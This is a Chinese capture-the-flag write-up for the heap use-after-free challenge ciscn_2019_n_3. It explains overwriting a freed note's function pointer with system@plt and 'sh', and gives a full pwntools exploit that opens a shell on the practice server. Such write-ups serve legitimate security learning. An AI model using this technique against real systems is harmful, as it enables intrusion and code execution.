ciscn_2019_n_3 Writeup

基本堆UAF

前提

  • 本程序中的释放堆块后未对堆块指针置空,从而可能引发UAF。
  • 程序本身带有函数system(),可以直接使用system@plt的方式使用该函数。
  • 涉及堆块结构的代码如下下文所示,第一种块大小固定位0x10(0x11),有一种块大小可控,最大为0x400。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
//当堆块结构是integer时
*(_DWORD *)v3 = rec_int_print;
*(_DWORD *)(v3 + 4) = rec_int_free;
*(_DWORD *)(v3 + 8) = ask("Value");

//当堆块结构是text时
*(_DWORD *)v3 = rec_int_print;
*(_DWORD *)(v3 + 4) = rec_int_free;
*(_DWORD *)(v3 + 8) = malloc(size); // *(_DWORD *)(v3 + 8) = malloc(size);

//text中的chunk相关
fgets(*(char **)(v3 + 8), size, stdin);

//其他函数
int __cdecl rec_int_print(int v3){
return printf("Note(Type=Integer, Value=%d)\n", *(_DWORD *)(v3 + 8));}

int __cdecl rec_int_free(void *ptr){
free(ptr);
return puts("Note freed!");}

思路

  • 申请三个类型为integer的块0、1、2。大小为固定的0x10。
  • 释放块0、1。
  • 重新申请一个类型为text的块,大小指定为0xc以下。按照tcache bin先进先出的结构,bin中的块1与0被依此分配,且可以对块1进行写操作,让指定位置的内容被覆盖为指定的内容。
    • 对块0的*(_DWORD *)v3 区域覆盖数据为sh/0/0。这是因为长度不足以输入/bin/sh,且要考虑程序流程引发的\a
    • 对块0的(_DWORD *)(v3 + 4)区域覆盖数据为system@plt
  • 释放块0即可获得shell。
    • 这是因为本程序的释放操作是使用指定块的(_DWORD *)(v3 + 4)区域内的自定函数完成的。该函数的结构如上文所示。

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *

context.log_level = "debug"
io = remote("node3.buuoj.cn",27237)
elf = ELF("./n_3_ciscn_2019")

def _new(index,_type,_value,_lenth=0):
io.sendlineafter("4. Purchase Pro Edition\nCNote > ",'1')
io.sendlineafter("Index > ",str(index))
io.sendlineafter("Type > ",str(_type))
if _type == 1:
io.sendlineafter("Value > ",str(_value))
else:
io.sendlineafter("Length > ",str(_lenth))
io.sendlineafter("Value > ",_value)

def _del(Index):
io.sendlineafter("4. Purchase Pro Edition\nCNote > ",'2')
io.sendlineafter("Index > ",str(Index))

payload = b'sh\0\0' + p32(elf.symbols['system'])

_new(0,1,1)
_new(1,1,1)
_new(2,1,1)
_del(0)
_del(1)
_new(3,2,payload,0xc)
_del(0)

io.interactive()
作者

Ch4m

发布于

2021-05-10

更新于

2021-05-10

许可协议